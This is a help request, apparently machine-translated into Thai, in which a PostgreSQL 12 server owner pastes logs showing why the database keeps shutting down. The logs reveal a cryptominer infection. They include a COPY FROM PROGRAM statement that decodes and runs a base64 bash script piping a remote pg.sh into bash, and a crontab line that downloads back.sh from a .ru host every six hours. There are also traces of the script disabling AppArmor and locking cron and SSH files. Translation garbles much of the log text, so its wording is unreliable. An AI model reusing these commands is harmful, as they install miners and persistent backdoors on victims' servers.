ฉันใช้ Ubuntu 18.04 และ postgresql 12
ดู Journalctl ด้านล่าง:
16 ธันวาคม 09:39:19 เซิร์ฟเวอร์ sudo[55084]: postgres : TTY=unknown ; PWD=/var/lib/postgresql/12/main ; USER=ราก ; คำสั่ง=/usr/sbin/sysctl kernel.nmi_watchdog=0
16 ธันวาคม 09:39:19 เซิร์ฟเวอร์ sudo[55084]: pam_unix(sudo:session): เซสชันเปิดสำหรับผู้ใช้รูทโดย (uid=0)
16 ธันวาคม 09:39:19 เซิร์ฟเวอร์ sudo[55084]: pam_unix(sudo:session): ปิดเซสชันสำหรับผู้ใช้รูท
16 ธันวาคม 09:39:24 เซิร์ฟเวอร์ crontab[56537]: (postgres) LIST (postgres)
16 ธันวาคม 09:39:24 เซิร์ฟเวอร์ crontab [56539]: (postgres) แทนที่ (postgres)
16 ธันวาคม 09:39:24 เซิร์ฟเวอร์ crontab[56543]: (postgres) LIST (postgres)
16 ธันวาคม 09:39:24 เซิร์ฟเวอร์ crontab [56545]: (postgres) แทนที่ (postgres)
16 ธันวาคม 09:39:24 เซิร์ฟเวอร์ crontab [56547]: (postgres) LIST (postgres)
16 ธันวาคม 09:39:24 เซิร์ฟเวอร์ crontab [56550]: (postgres) LIST (postgres)
16 ธันวาคม 09:39:24 เซิร์ฟเวอร์ crontab [56552]: (postgres) แทนที่ (postgres)
16 ธันวาคม 09:39:24 เซิร์ฟเวอร์ crontab[56553]: (postgres) LIST (postgres)
16 ธันวาคม 09:39:24 เซิร์ฟเวอร์ crontab [56555]: (postgres) แทนที่ (postgres)
16 ธันวาคม 09:39:24 เซิร์ฟเวอร์ crontab[56556]: (postgres) LIST (postgres)
16 ธันวาคม 09:39:24 เซิร์ฟเวอร์ crontab [56558]: (postgres) แทนที่ (postgres)
16 ธันวาคม 09:39:24 เซิร์ฟเวอร์ crontab[56559]: (postgres) LIST (postgres)
16 ธันวาคม 09:39:24 เซิร์ฟเวอร์ crontab [56561]: (postgres) แทนที่ (postgres)
16 ธันวาคม 09:39:24 เซิร์ฟเวอร์ crontab [56562]: (postgres) LIST (postgres)
16 ธันวาคม 09:39:24 เซิร์ฟเวอร์ crontab [56564]: (postgres) แทนที่ (postgres)
16 ธันวาคม 09:39:24 เซิร์ฟเวอร์ crontab[56565]: (postgres) LIST (postgres)
16 ธันวาคม 09:39:24 เซิร์ฟเวอร์ crontab [56567]: (postgres) แทนที่ (postgres)
16 ธันวาคม 09:39:24 เซิร์ฟเวอร์ crontab[56568]: (postgres) LIST (postgres)
16 ธันวาคม 09:39:24 เซิร์ฟเวอร์ crontab [56570]: (postgres) แทนที่ (postgres)
16 ธันวาคม 09:39:24 เซิร์ฟเวอร์ crontab[56571]: (postgres) LIST (postgres)
16 ธันวาคม 09:39:24 เซิร์ฟเวอร์ crontab [56573]: (postgres) แทนที่ (postgres)
16 ธันวาคม 09:39:24 เซิร์ฟเวอร์ crontab[56574]: (postgres) LIST (postgres)
16 ธันวาคม 09:39:24 เซิร์ฟเวอร์ crontab [56576]: (postgres) แทนที่ (postgres)
16 ธันวาคม 09:39:24 เซิร์ฟเวอร์ crontab[56577]: (postgres) LIST (postgres)
16 ธันวาคม 09:39:24 เซิร์ฟเวอร์ crontab [56579]: (postgres) แทนที่ (postgres)
16 ธันวาคม 09:39:24 เซิร์ฟเวอร์ crontab [56580]: (postgres) LIST (postgres)
16 ธันวาคม 09:39:24 เซิร์ฟเวอร์ crontab [56582]: (postgres) แทนที่ (postgres)
16 ธันวาคม 09:39:24 เซิร์ฟเวอร์ crontab [56583]: (postgres) LIST (postgres)
16 ธันวาคม 09:39:24 เซิร์ฟเวอร์ crontab [56585]: (postgres) แทนที่ (postgres)
16 ธันวาคม 09:39:24 เซิร์ฟเวอร์ crontab [56586]: (postgres) LIST (postgres)
16 ธันวาคม 09:39:24 เซิร์ฟเวอร์ crontab [56588]: (postgres) แทนที่ (postgres)
16 ธันวาคม 09:39:24 เซิร์ฟเวอร์ crontab[56589]: (postgres) LIST (postgres)
16 ธันวาคม 09:39:24 เซิร์ฟเวอร์ crontab [56591]: (postgres) แทนที่ (postgres)
16 ธันวาคม 09:39:24 เซิร์ฟเวอร์ crontab [56592]: (postgres) LIST (postgres)
16 ธันวาคม 09:39:24 เซิร์ฟเวอร์ crontab [56594]: (postgres) แทนที่ (postgres)
16 ธันวาคม 09:39:24 เซิร์ฟเวอร์ crontab [56595]: (postgres) LIST (postgres)
16 ธันวาคม 09:39:24 เซิร์ฟเวอร์ crontab [56597]: (postgres) แทนที่ (postgres)
16 ธันวาคม 09:39:24 เซิร์ฟเวอร์ crontab [56598]: (postgres) LIST (postgres)
16 ธันวาคม 09:39:24 เซิร์ฟเวอร์ crontab [56600]: (postgres) แทนที่ (postgres)
16 ธันวาคม 09:39:24 เซิร์ฟเวอร์ crontab [56601]: (postgres) LIST (postgres)
16 ธันวาคม 09:39:24 เซิร์ฟเวอร์ crontab [56603]: (postgres) แทนที่ (postgres)
16 ธันวาคม 09:39:24 เซิร์ฟเวอร์ crontab [56604]: (postgres) LIST (postgres)
16 ธันวาคม 09:39:24 เซิร์ฟเวอร์ crontab [56606]: (postgres) แทนที่ (postgres)
16 ธันวาคม 09:39:24 เซิร์ฟเวอร์ crontab [56607]: (postgres) LIST (postgres)
16 ธันวาคม 09:39:24 เซิร์ฟเวอร์ crontab [56609]: (postgres) แทนที่ (postgres)
16 ธันวาคม 09:39:24 เซิร์ฟเวอร์ crontab [56610]: (postgres) LIST (postgres)
16 ธันวาคม 09:39:24 เซิร์ฟเวอร์ crontab [56612]: (postgres) แทนที่ (postgres)
16 ธันวาคม 09:39:24 เซิร์ฟเวอร์ crontab [56613]: (postgres) LIST (postgres)
16 ธันวาคม 09:39:24 เซิร์ฟเวอร์ crontab [56615]: (postgres) แทนที่ (postgres)
16 ธันวาคม 09:39:24 เซิร์ฟเวอร์ crontab [56616]: (postgres) LIST (postgres)
16 ธันวาคม 09:39:24 เซิร์ฟเวอร์ crontab [56618]: (postgres) แทนที่ (postgres)
16 ธันวาคม 09:39:24 เซิร์ฟเวอร์ crontab [56619]: (postgres) LIST (postgres)
16 ธันวาคม 09:39:24 เซิร์ฟเวอร์ crontab [56621]: (postgres) แทนที่ (postgres)
16 ธันวาคม 09:39:24 เซิร์ฟเวอร์ crontab [56622]: (postgres) LIST (postgres)
16 ธันวาคม 09:39:24 เซิร์ฟเวอร์ crontab [56624]: (postgres) แทนที่ (postgres)
16 ธันวาคม 09:39:24 เซิร์ฟเวอร์ crontab [56625]: (postgres) รายการ (postgres)
16 ธันวาคม 09:39:24 เซิร์ฟเวอร์ crontab [56627]: (postgres) แทนที่ (postgres)
16 ธันวาคม 09:39:24 เซิร์ฟเวอร์ crontab [56628]: (postgres) LIST (postgres)
16 ธันวาคม 09:39:24 เซิร์ฟเวอร์ crontab [56630]: (postgres) แทนที่ (postgres)
16 ธันวาคม 09:39:24 เซิร์ฟเวอร์ crontab [56631]: (postgres) LIST (postgres)
16 ธันวาคม 09:39:24 เซิร์ฟเวอร์ crontab [56633]: (postgres) แทนที่ (postgres)
16 ธันวาคม 09:39:24 เซิร์ฟเวอร์ crontab [56634]: (postgres) LIST (postgres)
16 ธันวาคม 09:39:24 เซิร์ฟเวอร์ crontab [56636]: (postgres) แทนที่ (postgres)
16 ธันวาคม 09:39:24 เซิร์ฟเวอร์ crontab[56637]: (postgres) LIST (postgres)
16 ธันวาคม 09:39:24 เซิร์ฟเวอร์ crontab [56639]: (postgres) แทนที่ (postgres)
16 ธันวาคม 09:39:24 เซิร์ฟเวอร์ crontab [56640]: (postgres) LIST (postgres)
16 ธันวาคม 09:39:24 เซิร์ฟเวอร์ crontab [56642]: (postgres) แทนที่ (postgres)
16 ธันวาคม 09:39:24 เซิร์ฟเวอร์ crontab [56643]: (postgres) LIST (postgres)
16 ธันวาคม 09:39:24 เซิร์ฟเวอร์ crontab [56645]: (postgres) แทนที่ (postgres)
16 ธันวาคม 09:39:24 เซิร์ฟเวอร์ crontab [56646]: (postgres) LIST (postgres)
16 ธันวาคม 09:39:24 เซิร์ฟเวอร์ crontab [56648]: (postgres) แทนที่ (postgres)
16 ธันวาคม 09:39:24 เซิร์ฟเวอร์ crontab [56649]: (postgres) LIST (postgres)
16 ธันวาคม 09:39:24 เซิร์ฟเวอร์ crontab [56651]: (postgres) แทนที่ (postgres)
16 ธันวาคม 09:39:24 เซิร์ฟเวอร์ crontab [56652]: (postgres) LIST (postgres)
16 ธันวาคม 09:39:25 เซิร์ฟเวอร์ crontab [56654]: (postgres) แทนที่ (postgres)
16 ธันวาคม 09:39:25 เซิร์ฟเวอร์ crontab [56655]: (postgres) LIST (postgres)
16 ธันวาคม 09:39:25 เซิร์ฟเวอร์ crontab [56657]: (postgres) แทนที่ (postgres)
16 ธันวาคม 09:39:25 เซิร์ฟเวอร์ crontab [56658]: (postgres) LIST (postgres)
16 ธันวาคม 09:39:25 เซิร์ฟเวอร์ crontab [56660]: (postgres) แทนที่ (postgres)
16 ธันวาคม 09:39:25 เซิร์ฟเวอร์ crontab [56661]: (postgres) LIST (postgres)
16 ธันวาคม 09:39:25 เซิร์ฟเวอร์ crontab [56663]: (postgres) แทนที่ (postgres)
16 ธันวาคม 09:39:25 เซิร์ฟเวอร์ crontab [56664]: (postgres) LIST (postgres)
16 ธันวาคม 09:39:25 เซิร์ฟเวอร์ crontab [56666]: (postgres) แทนที่ (postgres)
16 ธันวาคม 09:39:25 เซิร์ฟเวอร์ crontab[56667]: (postgres) LIST (postgres)
16 ธันวาคม 09:39:25 เซิร์ฟเวอร์ crontab [56669]: (postgres) แทนที่ (postgres)
16 ธันวาคม 09:39:25 เซิร์ฟเวอร์ crontab [56670]: (postgres) LIST (postgres)
16 ธันวาคม 09:39:25 เซิร์ฟเวอร์ crontab [56672]: (postgres) แทนที่ (postgres)
16 ธันวาคม 09:39:25 เซิร์ฟเวอร์ crontab [56673]: (postgres) รายการ (postgres)
16 ธันวาคม 09:39:25 เซิร์ฟเวอร์ crontab [56675]: (postgres) แทนที่ (postgres)
16 ธันวาคม 09:39:25 เซิร์ฟเวอร์ crontab [56676]: (postgres) LIST (postgres)
16 ธันวาคม 09:39:25 เซิร์ฟเวอร์ crontab [56678]: (postgres) แทนที่ (postgres)
16 ธันวาคม 09:39:25 เซิร์ฟเวอร์ crontab [56679]: (postgres) LIST (postgres)
16 ธันวาคม 09:39:25 เซิร์ฟเวอร์ crontab [56681]: (postgres) แทนที่ (postgres)
16 ธันวาคม 09:39:25 เซิร์ฟเวอร์ crontab [56682]: (postgres) LIST (postgres)
16 ธันวาคม 09:39:25 เซิร์ฟเวอร์ crontab [56684]: (postgres) แทนที่ (postgres)
16 ธันวาคม 09:39:25 เซิร์ฟเวอร์ crontab [56685]: (postgres) LIST (postgres)
16 ธันวาคม 09:39:25 เซิร์ฟเวอร์ crontab [56687]: (postgres) แทนที่ (postgres)
16 ธันวาคม 09:39:25 เซิร์ฟเวอร์ crontab [56688]: (postgres) LIST (postgres)
16 ธันวาคม 09:39:25 เซิร์ฟเวอร์ crontab [56690]: (postgres) แทนที่ (postgres)
16 ธันวาคม 09:39:25 เซิร์ฟเวอร์ postgresql@12-main[56691]: คลัสเตอร์ไม่ทำงาน
16 ธ.ค. 09:39:25 ระบบเซิร์ฟเวอร์d[1]: [email protected]: ออกจากกระบวนการควบคุม รหัส=ออก สถานะ=2/INVALIDARGUMENT
16 ธันวาคม 09:39:25 เซิร์ฟเวอร์ systemd[1]: [email protected]: ล้มเหลวด้วยผลลัพธ์ 'exit-code'
บันทึกสำหรับช่วงเวลานี้:
rm: ไม่สามารถลบ '/var/log/syslog': การอนุญาตถูกปฏิเสธ
chattr: การอนุญาตถูกปฏิเสธขณะตั้งค่าสถานะบน /tmp/
chattr: การอนุญาตถูกปฏิเสธขณะตั้งค่าสถานะบน /var/tmp/
chattr: การอนุญาตถูกปฏิเสธขณะตั้งค่าสถานะบน /var/spool/cron
chattr: การอนุญาตถูกปฏิเสธขณะตั้งค่าสถานะบน /etc/crontab
ข้อผิดพลาด: คุณต้องรูทเพื่อเรียกใช้สคริปต์นี้
ร้ายแรง: ไม่สามารถเปิดไฟล์ล็อค /run/xtables.lock: ปฏิเสธการอนุญาต
ทุบตี: บรรทัดที่ 12: /proc/sys/kernel/nmi_watchdog: ปฏิเสธการอนุญาต
bash: บรรทัดที่ 13: /etc/sysctl.conf: ปฏิเสธการอนุญาต
userdel: ไม่มีผู้ใช้ 'akay'
userdel: ไม่มีผู้ใช้ 'vfinder'
chattr: การอนุญาตถูกปฏิเสธขณะพยายาม stat /root/.ssh/
chattr: การอนุญาตถูกปฏิเสธขณะพยายาม stat /root/.ssh/authorized_keys
(ไม่สามารถระบุกระบวนการทั้งหมดได้ ข้อมูลกระบวนการที่ไม่ได้เป็นเจ้าของ
จะไม่แสดง คุณจะต้องรูทเพื่อดูทั้งหมด)
(ไม่สามารถระบุกระบวนการทั้งหมดได้ ข้อมูลกระบวนการที่ไม่ได้เป็นเจ้าของ
จะไม่แสดง คุณจะต้องรูทเพื่อดูทั้งหมด)
(ไม่สามารถระบุกระบวนการทั้งหมดได้ ข้อมูลกระบวนการที่ไม่ได้เป็นเจ้าของ
จะไม่แสดง คุณจะต้องรูทเพื่อดูทั้งหมด)
(ไม่สามารถระบุกระบวนการทั้งหมดได้ ข้อมูลกระบวนการที่ไม่ได้เป็นเจ้าของ
จะไม่แสดง คุณจะต้องรูทเพื่อดูทั้งหมด)
(ไม่สามารถระบุกระบวนการทั้งหมดได้ ข้อมูลกระบวนการที่ไม่ได้เป็นเจ้าของ
จะไม่แสดง คุณจะต้องรูทเพื่อดูทั้งหมด)
(ไม่สามารถระบุกระบวนการทั้งหมดได้ ข้อมูลกระบวนการที่ไม่ได้เป็นเจ้าของ
จะไม่แสดง คุณจะต้องรูทเพื่อดูทั้งหมด)
(ไม่สามารถระบุกระบวนการทั้งหมดได้ ข้อมูลกระบวนการที่ไม่ได้เป็นเจ้าของ
จะไม่แสดง คุณจะต้องรูทเพื่อดูทั้งหมด)
(ไม่สามารถระบุกระบวนการทั้งหมดได้ ข้อมูลกระบวนการที่ไม่ได้เป็นเจ้าของ
จะไม่แสดง คุณจะต้องรูทเพื่อดูทั้งหมด)
(ไม่สามารถระบุกระบวนการทั้งหมดได้ ข้อมูลกระบวนการที่ไม่ได้เป็นเจ้าของ
จะไม่แสดง คุณจะต้องรูทเพื่อดูทั้งหมด)
(ไม่สามารถระบุกระบวนการทั้งหมดได้ ข้อมูลกระบวนการที่ไม่ได้เป็นเจ้าของ
จะไม่แสดง คุณจะต้องรูทเพื่อดูทั้งหมด)
(ไม่สามารถระบุกระบวนการทั้งหมดได้ ข้อมูลกระบวนการที่ไม่ได้เป็นเจ้าของ
จะไม่แสดง คุณจะต้องรูทเพื่อดูทั้งหมด)
(ไม่สามารถระบุกระบวนการทั้งหมดได้ ข้อมูลกระบวนการที่ไม่ได้เป็นเจ้าของ
จะไม่แสดง คุณจะต้องรูทเพื่อดูทั้งหมด)
(ไม่สามารถระบุกระบวนการทั้งหมดได้ ข้อมูลกระบวนการที่ไม่ได้เป็นเจ้าของ
จะไม่แสดง คุณจะต้องรูทเพื่อดูทั้งหมด)
(ไม่สามารถระบุกระบวนการทั้งหมดได้ ข้อมูลกระบวนการที่ไม่ได้เป็นเจ้าของ
จะไม่แสดง คุณจะต้องรูทเพื่อดูทั้งหมด)
(ไม่สามารถระบุกระบวนการทั้งหมดได้ ข้อมูลกระบวนการที่ไม่ได้เป็นเจ้าของ
จะไม่แสดง คุณจะต้องรูทเพื่อดูทั้งหมด)
(ไม่สามารถระบุกระบวนการทั้งหมดได้ ข้อมูลกระบวนการที่ไม่ได้เป็นเจ้าของ
จะไม่แสดง คุณจะต้องรูทเพื่อดูทั้งหมด)
(ไม่สามารถระบุกระบวนการทั้งหมดได้ ข้อมูลกระบวนการที่ไม่ได้เป็นเจ้าของ
จะไม่แสดง คุณจะต้องรูทเพื่อดูทั้งหมด)
(ไม่สามารถระบุกระบวนการทั้งหมดได้ ข้อมูลกระบวนการที่ไม่ได้เป็นเจ้าของ
จะไม่แสดง คุณจะต้องรูทเพื่อดูทั้งหมด)
(ไม่สามารถระบุกระบวนการทั้งหมดได้ ข้อมูลกระบวนการที่ไม่ได้เป็นเจ้าของ
จะไม่แสดง คุณจะต้องรูทเพื่อดูทั้งหมด)
(ไม่สามารถระบุกระบวนการทั้งหมดได้ ข้อมูลกระบวนการที่ไม่ได้เป็นเจ้าของ
จะไม่แสดง คุณจะต้องรูทเพื่อดูทั้งหมด)
(ไม่สามารถระบุกระบวนการทั้งหมดได้ ข้อมูลกระบวนการที่ไม่ได้เป็นเจ้าของ
จะไม่แสดง คุณจะต้องรูทเพื่อดูทั้งหมด)
(ไม่สามารถระบุกระบวนการทั้งหมดได้ ข้อมูลกระบวนการที่ไม่ได้เป็นเจ้าของ
จะไม่แสดง คุณจะต้องรูทเพื่อดูทั้งหมด)
(ไม่สามารถระบุกระบวนการทั้งหมดได้ ข้อมูลกระบวนการที่ไม่ได้เป็นเจ้าของ
จะไม่แสดง คุณจะต้องรูทเพื่อดูทั้งหมด)
(ไม่สามารถระบุกระบวนการทั้งหมดได้ ข้อมูลกระบวนการที่ไม่ได้เป็นเจ้าของ
จะไม่แสดง คุณจะต้องรูทเพื่อดูทั้งหมด)
(ไม่สามารถระบุกระบวนการทั้งหมดได้ ข้อมูลกระบวนการที่ไม่ได้เป็นเจ้าของ
จะไม่แสดง คุณจะต้องรูทเพื่อดูทั้งหมด)
(ไม่สามารถระบุกระบวนการทั้งหมดได้ ข้อมูลกระบวนการที่ไม่ได้เป็นเจ้าของ
จะไม่แสดง คุณจะต้องรูทเพื่อดูทั้งหมด)
cat: /tmp/.X11-unix/01: ไม่มีไฟล์หรือไดเรกทอรีดังกล่าว
cat: /tmp/.X11-unix/11: ไม่มีไฟล์หรือไดเรกทอรีดังกล่าว
cat: /tmp/.X11-unix/22: ไม่มีไฟล์หรือไดเรกทอรีดังกล่าว
cat: /tmp/.pg_stat.0: ไม่มีไฟล์หรือไดเรกทอรีดังกล่าว
cat: /tmp/.pg_stat.1: ไม่มีไฟล์หรือไดเรกทอรีดังกล่าว
cat: /data/./oka.pid: ไม่มีไฟล์หรือไดเรกทอรีดังกล่าว
16-12-2021 09:39:20.212 +06 [54731] LOG: ได้รับคำขอปิดระบบอัจฉริยะ
2021-12-16 09:39:20.222 +06 [54731] LOG: ผู้ปฏิบัติงานเบื้องหลัง "ตัวเรียกใช้การจำลองแบบเชิงตรรกะ" (PID 54738) ออกด้วยรหัสทางออก 1
grep: เครื่องหมายแบ็กสแลชต่อท้าย
ฆ่า: (16): ไม่อนุญาตให้ดำเนินการ
kill: (56000): ไม่มีกระบวนการดังกล่าว
kill: (56005): ไม่มีกระบวนการดังกล่าว
(ไม่สามารถระบุกระบวนการทั้งหมดได้ ข้อมูลกระบวนการที่ไม่ได้เป็นเจ้าของ
จะไม่แสดง คุณจะต้องรูทเพื่อดูทั้งหมด)
(ไม่สามารถระบุกระบวนการทั้งหมดได้ ข้อมูลกระบวนการที่ไม่ได้เป็นเจ้าของ
จะไม่แสดง คุณจะต้องรูทเพื่อดูทั้งหมด)
(ไม่สามารถระบุกระบวนการทั้งหมดได้ ข้อมูลกระบวนการที่ไม่ได้เป็นเจ้าของ
จะไม่แสดง คุณจะต้องรูทเพื่อดูทั้งหมด)
(ไม่สามารถระบุกระบวนการทั้งหมดได้ ข้อมูลกระบวนการที่ไม่ได้เป็นเจ้าของ
จะไม่แสดง คุณจะต้องรูทเพื่อดูทั้งหมด)
(ไม่สามารถระบุกระบวนการทั้งหมดได้ ข้อมูลกระบวนการที่ไม่ได้เป็นเจ้าของ
จะไม่แสดง คุณจะต้องรูทเพื่อดูทั้งหมด)
ไม่สามารถหยุด c3pool_miner.service: การเข้าถึงถูกปฏิเสธ
ดูบันทึกระบบและ 'สถานะ systemctl c3pool_miner.service' สำหรับรายละเอียด
log_rot: ไม่พบกระบวนการ
chattr: ไม่มีไฟล์หรือไดเร็กทอรีดังกล่าวขณะพยายาม stat /etc/ld.so.preload
rm: ไม่สามารถลบ '/opt/atlassian/confluence/bin/1.sh': ไม่มีไฟล์หรือไดเร็กทอรีดังกล่าว
rm: ไม่สามารถลบ '/opt/atlassian/confluence/bin/1.sh.1': ไม่มีไฟล์หรือไดเร็กทอรีดังกล่าว
rm: ไม่สามารถลบ '/opt/atlassian/confluence/bin/1.sh.2': ไม่มีไฟล์หรือไดเร็กทอรีดังกล่าว
rm: ไม่สามารถลบ '/opt/atlassian/confluence/bin/1.sh.3': ไม่มีไฟล์หรือไดเร็กทอรีดังกล่าว
rm: ไม่สามารถลบ '/opt/atlassian/confluence/bin/3.sh': ไม่มีไฟล์หรือไดเร็กทอรีดังกล่าว
rm: ไม่สามารถลบ '/opt/atlassian/confluence/bin/3.sh.1': ไม่มีไฟล์หรือไดเร็กทอรีดังกล่าว
rm: ไม่สามารถลบ '/opt/atlassian/confluence/bin/3.sh.2': ไม่มีไฟล์หรือไดเร็กทอรีดังกล่าว
rm: ไม่สามารถลบ '/opt/atlassian/confluence/bin/3.sh.3': ไม่มีไฟล์หรือไดเร็กทอรีดังกล่าว
rm: ไม่สามารถลบ '/var/tmp/lib': ไม่มีไฟล์หรือไดเร็กทอรีดังกล่าว
rm: ไม่สามารถลบ '/var/tmp/.lib': ไม่มีไฟล์หรือไดเร็กทอรีดังกล่าว
chattr: ไม่มีไฟล์หรือไดเร็กทอรีดังกล่าวขณะพยายาม stat /etc/ld.so.preload
rm: ไม่สามารถลบ '/opt/atlassian/confluence/bin/1.sh': ไม่มีไฟล์หรือไดเร็กทอรีดังกล่าว
rm: ไม่สามารถลบ '/opt/atlassian/confluence/bin/1.sh.1': ไม่มีไฟล์หรือไดเร็กทอรีดังกล่าว
rm: ไม่สามารถลบ '/opt/atlassian/confluence/bin/1.sh.2': ไม่มีไฟล์หรือไดเร็กทอรีดังกล่าว
rm: ไม่สามารถลบ '/opt/atlassian/confluence/bin/1.sh.3': ไม่มีไฟล์หรือไดเร็กทอรีดังกล่าว
rm: ไม่สามารถลบ '/opt/atlassian/confluence/bin/3.sh': ไม่มีไฟล์หรือไดเร็กทอรีดังกล่าว
rm: ไม่สามารถลบ '/opt/atlassian/confluence/bin/3.sh.1': ไม่มีไฟล์หรือไดเร็กทอรีดังกล่าว
rm: ไม่สามารถลบ '/opt/atlassian/confluence/bin/3.sh.2': ไม่มีไฟล์หรือไดเร็กทอรีดังกล่าว
rm: ไม่สามารถลบ '/opt/atlassian/confluence/bin/3.sh.3': ไม่มีไฟล์หรือไดเร็กทอรีดังกล่าว
rm: ไม่สามารถลบ '/var/tmp/lib': ไม่มีไฟล์หรือไดเร็กทอรีดังกล่าว
rm: ไม่สามารถลบ '/var/tmp/.lib': ไม่มีไฟล์หรือไดเร็กทอรีดังกล่าว
chattr: ไม่มีไฟล์หรือไดเร็กทอรีดังกล่าวขณะพยายาม stat /tmp/lok
chmod: ไม่สามารถเข้าถึง '/tmp/lok': ไม่มีไฟล์หรือไดเรกทอรีดังกล่าว
ทุบตี: บรรทัด 545: นักเทียบท่า: ไม่พบคำสั่ง
ทุบตี: บรรทัด 546: นักเทียบท่า: ไม่พบคำสั่ง
ทุบตี: บรรทัด 547: นักเทียบท่า: ไม่พบคำสั่ง
ทุบตี: บรรทัด 548: นักเทียบท่า: ไม่พบคำสั่ง
ทุบตี: บรรทัด 549: นักเทียบท่า: ไม่พบคำสั่ง
ทุบตี: บรรทัด 550: นักเทียบท่า: ไม่พบคำสั่ง
ทุบตี: บรรทัด 551: นักเทียบท่า: ไม่พบคำสั่ง
ทุบตี: บรรทัด 552: นักเทียบท่า: ไม่พบคำสั่ง
ทุบตี: บรรทัด 553: นักเทียบท่า: ไม่พบคำสั่ง
ทุบตี: บรรทัด 554: นักเทียบท่า: ไม่พบคำสั่ง
ทุบตี: บรรทัด 555: นักเทียบท่า: ไม่พบคำสั่ง
ทุบตี: บรรทัด 556: นักเทียบท่า: ไม่พบคำสั่ง
ทุบตี: บรรทัด 557: นักเทียบท่า: ไม่พบคำสั่ง
ทุบตี: บรรทัด 558: นักเทียบท่า: ไม่พบคำสั่ง
ทุบตี: บรรทัด 559: นักเทียบท่า: ไม่พบคำสั่ง
ทุบตี: บรรทัด 560: นักเทียบท่า: ไม่พบคำสั่ง
ทุบตี: บรรทัด 561: นักเทียบท่า: ไม่พบคำสั่ง
ทุบตี: บรรทัด 562: นักเทียบท่า: ไม่พบคำสั่ง
ทุบตี: บรรทัด 563: นักเทียบท่า: ไม่พบคำสั่ง
ทุบตี: บรรทัด 564: นักเทียบท่า: ไม่พบคำสั่ง
ทุบตี: บรรทัด 565: นักเทียบท่า: ไม่พบคำสั่ง
ทุบตี: บรรทัด 566: นักเทียบท่า: ไม่พบคำสั่ง
ทุบตี: บรรทัด 567: setenforce: ไม่พบคำสั่ง
ทุบตี: บรรทัด 568: /etc/selinux/config: ปฏิเสธการอนุญาต
ไม่สามารถหยุด apparmor.service: การเข้าถึงถูกปฏิเสธ
ดูบันทึกระบบและ 'systemctl status apparmor.service' สำหรับรายละเอียด
การซิงโครไนซ์สถานะของ apparmor.service กับสคริปต์บริการ SysV ด้วย /lib/systemd/systemd-sysv-install
กำลังดำเนินการ: /lib/systemd/systemd-sysv-install ปิดใช้งาน apparmor
ไม่สามารถโหลด daemon ใหม่ได้: การเข้าถึงถูกปฏิเสธ
update-rc.d: ข้อผิดพลาด: การอนุญาตถูกปฏิเสธ
ไม่สามารถหยุด aliyun.service.service: การเข้าถึงถูกปฏิเสธ
ดูบันทึกระบบและ 'สถานะ systemctl aliyun.service.service' สำหรับรายละเอียด
ไม่สามารถปิดการใช้งานหน่วย: การเข้าถึงถูกปฏิเสธ
/tmp/kinsing คือ 648effa354b3cbaad87b45f48d59c616
16-12-2021 09:39:25.123 +06 [55065] postgres@postgres FATAL: ยุติการเชื่อมต่อเนื่องจากคำสั่งของผู้ดูแลระบบ
2021-12-16 09:39:25.123 +06 [55065] postgres@postgres CONTEXT: COPY opwcztav บรรทัด 1: "kernel.nmi_watchdog = 0"
2021-12-16 09:39:25.123 +06 [55065] postgres@postgres STATEMENT: DROP TABLE IF EXISTS OPWczTav;CREATE TABLE OPWczTav(cmd_output text);COPY OPWczTav FROM PROGRAM 'echo IyEvYmluL2Jhc2gKcGtpbGwgLWYgenN2Ywpwa2lsbCAtZiBwZGVmZW5kZXJkCnBraWxsIC1mIHVwZGF0ZWNoZWNrZXJkCgpmdW5jdGlvbiBfX2N1cmwoKSB7CiAgcmVhZCBwcm90byBzZXJ2ZXIgcGF0aCA8PDwkKGVjaG8gJHsxLy8vLyB9KQogIERPQz0vJHtwYXRoLy8gLy99CiAgSE9TVD0ke3NlcnZlci8vOip9CiAgUE9SVD0ke3NlcnZlci8vKjp9CiAgW1sgeCIke0hPU1R9IiA9PSB4IiR7UE9SVH0iIF1dICYmIFBPUlQ9ODAKCiAgZXhlYyAzPD4vZGV2L3RjcC8ke0hPU1R9LyRQT1JUCiAgZWNobyAtZW4gIkdFVCAke0RPQ30gSFRUUC8xLjBcclxuSG9zdDogJHtIT1NUfVxyXG5cclxuIiA+JjMKICAod2hpbGUgcmVhZCBsaW5lOyBkbwogICBbWyAiJGxpbmUiID09ICQnXHInIF1dICYmIGJyZWFrCiAgZG9uZSAmJiBjYXQpIDwmMwogIGV4ZWMgMz4mLQp9CgppZiBbIC14ICIkKGNvbW1hbmQgLXYgY3VybCkiIF07IHRoZW4KICBjdXJsIDE4NS4yNTAuMTQ4LjIxNy9wZy5zaHxiYXNoCmVsaWYgWyAteCAiJChjb21tYW5kIC12IHdnZXQpIiBdOyB0aGVuCiAgd2dldCAtcSAtTy0gMTg1LjI1MC4xNDguMjE3L3BnLnNofGJhc2gKZWxzZQogIF9fY3VybCBodHRwOi8vMTg1LjI1MC4xNDguMjE3L3BnMi5z aHxiYXNoCmZp|base64 -d|bash';SELECT * จาก OPWczTav;วางตารางหากมี OPWczTav;
2021-12-16 09:39:25.142 +06 [54733] LOG: ปิดระบบ
2021-12-16 09:39:25.167 +06 [54731] LOG: ระบบฐานข้อมูลถูกปิด
ฉันสแกนระบบด้วย ClamAV พบไฟล์มัลแวร์ในเส้นทาง /var/lib/postgresql/12/main/a
.
เนื้อหา:
ผูก: ไม่อนุญาตให้ดำเนินการ
cmd: echo "*/30 * * * * /var/lib/postgresql/12/main/./oka" > /tmp/a;echo "* */6 * * * wget -q -O- http:/ /xmr.linux1213.ru:2019/back.sh | sh">> /tmp/a; crontab /tmp/a;rm -rf /tmp/a
การตรวจสอบเริ่มต้น
การเชื่อมต่อล้มเหลว ส่งคืน: -1
มันเป็นแหล่งของปัญหา?